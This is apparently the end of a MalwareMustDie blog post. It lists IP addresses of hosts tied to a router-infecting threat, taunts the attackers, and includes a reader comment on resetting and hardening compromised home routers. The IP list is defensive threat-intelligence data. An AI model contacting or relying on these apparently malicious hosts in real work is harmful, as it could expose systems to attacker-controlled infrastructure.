89.248.168.29
89.248.172.201
94.102.53.144
89.248.162.167
89.248.162.171
89.248.166.131
89.248.168.39
89.248.172.166
89.248.172.173
94.102.49.197
94.102.63.136
46.165.251.153
178.162.199.88
178.162.205.4
178.162.205.29
178.162.205.30
178.162.211.200
178.162.211.211
178.162.211.213
178.162.211.214
178.162.211.215
178.162.211.216
178.162.211.217

(February 13, 2016)
149.202.153.56
173.208.196.202
188.0.236.27
188.209.52.228
192.210.220.3
198.23.238.215
198.23.238.251
208.67.1.130
208.67.1.33
208.69.31.11
5.152.206.162
5.196.8.171
89.248.162.167

Notes:

Thank you for the friends who contributed much for this data, and the willing to share to prevent infections getting out of control.

Just for LOL, thank's for FREE promotion of MalwareMustDie.ORG, skiddies :))

We have a much better KungFu than yours kiddo :)

#MalwareMustDie!


Fear thou not; 
for I [am] with thee: be not dismayed; 
for I [am] thy God: I will strengthen thee; 
yea, I will help thee; 
yea, I will uphold thee with the right hand of my righteousness.

☩Isaiah 41:10  

1 comment:

  1. Answering the communication received regarding to the post:

    1. IF we have the router that's being hacked and used by this threat's badness, they mostly gaining access by default login and password or, lesser chances from the GUI vulnerability exploitation. Home / SOHO routers mostly get pwned to the root user, so in ordewr to fix it you must RESET the router into the factory base setting. Setting up it again with more secure setting, like using your own password and do not open telnet ports and limiting access to SSH by putting its limit access to the firewall setting, and so on. Then save the setting configuration outside of the router that can be restored fast if you have another incident.

    2. Mostly hackers want to OWN the system but don't want to mess up the system, even you can not access to the device remotely anymore you still have the hard access to the router hardware directly, just reset and restore it with better setting described above. Just avoid simple password and terminate unnecessary services too, and start optimizing the firewall.

    ReplyDelete